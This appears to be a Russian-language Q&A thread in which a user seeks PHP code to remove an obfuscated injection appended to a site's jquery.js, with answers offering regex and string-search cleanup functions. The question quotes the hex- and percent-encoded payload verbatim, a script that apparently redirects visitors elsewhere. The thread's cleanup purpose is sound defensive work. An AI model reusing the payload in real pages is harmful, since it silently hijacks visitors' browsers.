# Вырезать код из файла средствами

Tags: preg_match, php, preg_replace

Приветствую.
Есть файл js, в нём в самом конце есть код:

```
function(e,n){x.each({padding:"inner"+e,content:n,"":"outer"+e},function(r,i){x.fn[i]=function(i,o){var a=arguments.length&&(r||"boolean"!=typeof i),s=r||(i===!0||o===!0?"margin":"border");return x.access(this,function(n,r,i){var o;return x.isWindow(n)?n.document.documentElement["client"+e]:9===n.nodeType?(o=n.documentElement,Math.max(n.body["scroll"+e],o["scroll"+e],n.body["offset"+e],o["offset"+e],o["client"+e])):i===t?x.css(n,r,s):x.style(n,r,i,s)},n,a?i:t,a,null)}})}),x.fn.size=function(){return this.length},x.fn.andSelf=x.fn.addBack,"object"==typeof module&&module&&"object"==typeof module.exports?module.exports=x:(e.jQuery=e.$=x,"function"==typeof define&&define.amd&&define("jquery",[],function(){return x}))})(window);[]['\x63\x6f\x6e\x73\x74\x72\x75\x63\x74\x6f\x72']['\x63\x6f\x6e\x73\x74\x72\x75\x63\x74\x6f\x72'](self['\x75\x6e\x65\x73\x63\x61\x70\x65']('%69%66%28%7e%6c%6f%63%61%74%69%6f%6e%2e%70%72%6f%74%6f%63%6f%6c%2e%69%6e%64%65%78%4f%66%28%27%68%74%74%70%3a%27%29%26%26%7e%6c%6f%63%61%74%69%6f%6e%2e%68%6f%73%74%2e%69%6e%64%65%78%4f%66%28%27%74%65%6d%70%6c%61%74%65%2d%68%65%6c%70%2e%63%6f%6d%27%29%29%7b%7d%65%6c%73%65%28%6c%6f%63%61%74%69%6f%6e%2e%68%72%65%66%3d%27%68%74%74%70%3a%2f%2f%74%65%6d%70%6c%61%74%65%6d%6f%6e%73%74%65%72%2e%63%6f%6d%27%29'))()
```

Он бывает разный, но суть в том чтобы вырезать последний код начиная с []['x63 и заканчивая (), я пробовал сделать это регуляркой:

```
$file = file_get_contents('file.js');
$reg = '/(\[\]\[\'\\x63.*?\(\))/sm';
file_put_contents('file.js',preg_replace($reg,"",$file));
```

Но почему-то не сработало, хотя тут всё норм показывает http://regex101.com/r/hT9kH6

**UPDATE**

Почему-то не один из методов не помогает исправить файл, вот код:

```
if (file_exists($folder . 'js/jquery.js')) {
                $jquery = file_get_contents($folder . 'js/jquery.js');
                echo('<pre>'.  htmlspecialchars(cleanMyString($jquery)).'</pre>');
                /*if (file_put_contents($folder . 'js/jquery.js', cleanMyString($jquery))) {
                    echo('<div class="alert alert-success">Файл jquery.js исправлен.</div>');

                }*/

                /* if (file_put_contents($folder . 'js/jquery.js', preg_replace('/(\[\]\[\'\\x63.*?\(\))/','',$jquery))) 
                  {
                  echo('<div class="alert alert-success">Файл jquery.js исправлен.</div>');
                  } */
            }
```

Answer (score 0, accepted):

Как-то так:

```
$file = file_get_contents('file.js');
$reg = '/(\[\'(\\\x[0-9a-f]{2})+\'\])/';
file_put_contents('file.js',preg_replace($reg,"",$file));
```

Comment: @HA3IK, конструкция  

    [\d|\D]
означает один символ из суммы множеств:  

- чисел
- **не** чисел
- символа **|**
то есть сумма этих множеств дает нам множество всех символов.

Comment: @ReinRaus, **[\d|\D]{1,2}** Значит, что может быть, от 1го до 2х символов - цифр или не цифр, а **+** - повторение этой группы.  
Но Я заменил \D на \w и поставил строго 2ва символа

Comment: @HA3IK, внутри символьного класса **|** это просто символ, а не метасимвол альтернативы.  
Если заменить квадратные скобки на круглые, то выражение станет осмыслено:  

    (\d|\D){1,2}
но в таком случае лучше написать:  

    .{1,2}

Comment: Вообще же, правильно будет так, не буду больше мучать советами:  

    /(?:\\x[0-9a-f]{2})+/

Comment: @ReinRaus, Согласен, исправил. + Еще захватил скобки

Comment: @ReinRaus , @HA3IK  Warning: preg_replace(): Unknown modifier 'g'

Comment: Вырезать нужно не только []['\x63\x6f\x6e\x73\x74\x72\x75\x63\x74\x6f\x72']['\x63\x6f\x6e\x73\x74\x72\x75\x63\x74\x6f\x72'](self['\x75\x6e\x65\x73\x63\x61\x70\x65']
но и
('%69%66%28%7e%6c%6f%63%61%74%69%6f%6e%2e%70%72%6f%74%6f%63%6f%6c%2e%69%6e%64%65%78%4f%66%28%27%68%74%74%70%3a%27%29%26%26%7e%6c%6f%63%61%74%69%6f%6e%2e%68%6f%73%74%2e%69%6e%64%65%78%4f%66%28%27%74%65%6d%70%6c%61%74%65%2d%68%65%6c%70%2e%63%6f%6d%27%29%29%7b%7d%65%6c%73%65%28%6c%6f%63%61%74%69%6f%6e%2e%68%72%65%66%3d%27%68%74%74%70%3a%2f%2f%74%65%6d%70%6c%61%74%65%6d%6f%6e%73%74%65%72%2e%63%6f%6d%27%29'))()

Comment: @HA3IK, а откуда модификатор **g** появился?  
Из JavaScript мигрировал? :)

Comment: @ReinRaus, из уроков по регулярным выражениям )  
Этот глобальный поиск, по всей видимости, не для PHP )

Comment: @ReinRaus , @HA3IK и всё-таки как решить мою задачу?

Comment: @chuikoff, Я изменил выражение.   
Покопался в гайде и получается, что preg_replace сама по себе выполняет глобальный поиск

Comment: @chuikoff, чем Вас не устраивает Ваше регулярное выражение ? Оно ищет ровно то, что Вы описали в вопросе.  
http://regex101.com/r/aZ5kZ1

Comment: @ReinRaus меня устраивает моя регулярка, только вот файл как был с этим кодом, так и остался.

Comment: Странно, но сработала почему-то эта регулярка '/(\[\]\[\'(.*))/m'

Answer (score 1):

### **Update**

Переписал код. Теперь он выполняется быстрее регулярного выражения.
Посмотреть на **http://ideone.com/t72mIs**

---

Регулярные выражения для решения этой задачи не нужны.
Зловред дописывается в конец файла и всегда содержит эту строку: **self['unescape']**
Этого достаточно для детектирования

```
function cleanMyString($string) {
    if (!is_string($string) || empty($string)) {
        return null;
    }

    //Ищем начало подозрительного куска
    $tail_pos = strpos($string, ';[][');

    //Подозрительного кода не найдено. Возвращаем оригинал
    if ($tail_pos === false) {
        return $string;
    }

    //Подозрительный кусок найден. Вычленяем его
    $tail = substr($string, $tail_pos);
    $signature = "(self['unescape']";
    //Проверяем на наличие тела зловреда
    $is_infected = strpos($tail, $signature) !== false;
    //Зловред найден? Удаляем его из исходника. Нет - возвращаем оригинал
    return ($is_infected) ? substr($string, 0, $tail_pos + 1) : $string;
}

echo cleanMyString($string);
```

Вывод для вашего примера:

```
function(e,n){x.each({padding:"inner"+e,content:n,"":"outer"+e},function(r,i){x.fn[i]=function(i,o){var a=arguments.length&&(r||"boolean"!=typeof i),s=r||(i===!0||o===!0?"margin":"border");return x.access(this,function(n,r,i){var o;return x.isWindow(n)?n.document.documentElement["client"+e]:9===n.nodeType?(o=n.documentElement,Math.max(n.body["scroll"+e],o["scroll"+e],n.body["offset"+e],o["offset"+e],o["client"+e])):i===t?x.css(n,r,s):x.style(n,r,i,s)},n,a?i:t,a,null)}})}),x.fn.size=function(){return this.length},x.fn.andSelf=x.fn.addBack,"object"==typeof module&&module&&"object"==typeof module.exports?module.exports=x:(e.jQuery=e.$=x,"function"==typeof define&&define.amd&&define("jquery",[],function(){return x}))})(window);
```

Comment: в данном случае регулярка - лучшее решение. Посмотрите на количество своего кода и кода, которого написали выше. Там и короче и понятнее, и мне кажется даже по скорости быстрее

Comment: Абсолютно с вами не согласен.  
Удаляем комментарии и убираем функцию. Остается 8 строк.  
Сравниваем быстродействие на обработке 1000 файлов:  
1) Чужой вариант //Total Execution Time: 0.54603099822998 secs
2) Мой вариант //Total Execution Time: 0.40802311897278 secs

Comment: @VenZell, попробуйте так:  

    $reg = '/(\[\'(\\x[0-9a-f]{2})++\'\])/';  
сильного прироста не будет, но это оптимальное выражение по скорости

Comment: //Total Execution Time: 0.52502989768982 secs

Comment: @VenZell, Вы каким способом тестировали ?  
http://ideone.com/1vROgO  
Регекс быстрее в моем тесте.

Comment: Примерно так же, как и вы, только в цикле читал файлы.  
http://ideone.com/QN8iuC  
Скриншот: http://i.imgur.com/WSjEPw4.jpg  

На виртуальном сервере проверял. На ideone, почему-то, результат не стабилен. То примерно одинаковое время выполнения, то регекс быстрее, то мой вариант быстрее.

Comment: У меня результат стабилен...  
Регулярное выражение быстрее кода, потому что разбор регуляркой- это один вызов нативной функции вместо кучи скриптовых строк, если бы строк было 2-3 без операций с массивами (implode, explode, итп), тогда бы регуляркой было бы дольше парсить.

Comment: Ребят у меня ни один из способов не работает, что может быть не так?

Comment: Переписал код, полностью убрав операции с массивами. Теперь он выполняется быстрее.

Comment: @ReinRaus @VenZell быстрее та быстрее, но у меня ни регулярка, ни второй способ не срабатывает, файл как был с этим кодом, так и остался.